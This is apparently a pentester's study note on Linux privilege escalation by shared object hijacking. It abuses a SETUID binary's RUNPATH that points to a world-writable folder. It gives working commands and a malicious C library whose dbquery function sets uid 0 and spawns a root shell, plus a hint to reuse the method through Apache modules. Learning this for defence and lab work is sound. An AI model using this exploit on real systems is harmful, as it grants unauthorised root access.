d4rtht3ll3ctus' root vault

Shared Object Hijacking

2 min read

Programs and binaries under development usually have custom libraries associated with them. Consider the following SETUID binary.

ls -la payroll
 
-rwsr-xr-x 1 root root 16728 Sep  1 22:05 payroll

We can use ldd to print the shared object required by a binary or shared object. Ldd displays the location of the object and the hexadecimal address where it is loaded into memory for each of a program’s dependencies.

ldd payroll
 
linux-vdso.so.1 =>  (0x00007ffcb3133000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)

We see a non-standard library named libshared.so listed as a dependency for the binary. As stated earlier, it is possible to load shared libraries from custom locations. One such setting is the RUNPATH configuration. Libraries in this folder are given preference over other folders. This can be inspected using the readelf utility.

readelf -d payroll  | grep PATH

The configuration allows the loading of libraries from the /development folder, which is writable by all users. This misconfiguration can be exploited by placing a malicious library in /development, which will take precedence over other folders because entries in this file are checked first (before other folders present in the configuration files).

ldd payroll
 
linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)
cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
./payroll 
 
./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
 
void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
} 
gcc src.c -fPIC -shared -o /development/libshared.so
./payroll

Same for other types of shared objects which can be loaded in other types of applications like the Apache LoadModule Primitive , complie own .so file and load it to execute the command and get elevated privileges

Graph View